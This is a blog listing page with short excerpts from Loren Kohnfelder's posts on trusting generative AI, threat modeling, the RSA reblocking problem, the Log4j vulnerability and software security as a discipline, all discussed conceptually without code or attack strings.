Trusting AI

Whenever considering applications that rely on generative AI, I believe we always need to ask if we can trust it. And given the technology’s track record it’s hard to imagine how we are going to honestly be able to say “100%” any time soon. That’s why, for the time being, I think the following guideline will be very important.

[Read More]

Trusting AI

  • (220 words) June 2024 – Loren Kohnfelder

Whether or not this unscientific test is reliable, asking generative AI if a mushroom is safe to eat — it misclassified a highly toxic variety that looks like a common edible one — is a terrible idea if you are prepared to eat according to what it says. This illustrates my rule of thumb:

[Read More]

Better security discussions

I’ve been a fan of threat modeling for many years, but only recently seeing that it isn’t just behind-the-scenes work for software professionals to do. Threats and mitigations need to be part of any discussion about security. That is, news articles that urgently warn of the latest zero-day or when privacy advocates decry the latest outrage from the big platforms, to frame a good discussion requires outlining the threat model you are talking about.

[Read More]

Better security discussions

(900 words) May 2024 – Loren Kohnfelder

We understand software security best through specific threats and mitigations, articulated by threat models shared openly. Without this context we avoid much needed meaningful security discussions.

[Read More]

On the Signature Reblocking Problem in Public Key Cryptosystems

In Chapter 5 of the book I write about my good fortunate meeting two of the RSA algorithm inventors at MIT, and collaborating with them. As soon as I had a chance to ready their (as yet unpublished) paper, the “reblocking problem” bothered me as a rather awkward implementation detail. This refers to a technical issue described in Section X (Avoiding “Reblocking” When Encrypting A Signed Message) of the foundational RSA paper that is described in a nutshell in the first sentence.

[Read More]

Learning from Log4j

With Log4j very much in the news, if I could update my new book by magic it would make a terrific real world example to write about because it ties together a number of topics in the book. This vulnerability stems from failure to sanitize untrusted inputs, enabling an injection attack that potentially can access arbitrary targets using authentication credentials held by the target server. All the attacker has to do is craft an attack string that manages to get logged somehow, and the widely used Apache Log4j 2 component executes whatever the attacker commands.

[Read More]

A Wicked Problem

A wicked problem is one that is difficult to even clearly describe because of its diffuse and interconnected nature, and this is a useful lens to view software security. How are we doing overall at software security? How do you even define the standard to measure against?

[Read More]

Vulnerabilities are Mistakes

Spilled coffee beans, breaking the sound barrier, and software security

The Right Stuff is Tom Wolfe’s popular history of the US astronaut program, and it begins by recounting the early effort to break the sound barrier which involved such frequent crashes that there were weekly funerals for test pilots. What’s most striking about the account of this early period in what would become the space program is how the pilots gathering to bury their comrades would invariably talk themselves into believing that they would never have crashed — it was always the other guy who messed up and sadly paid the price.

[Read More]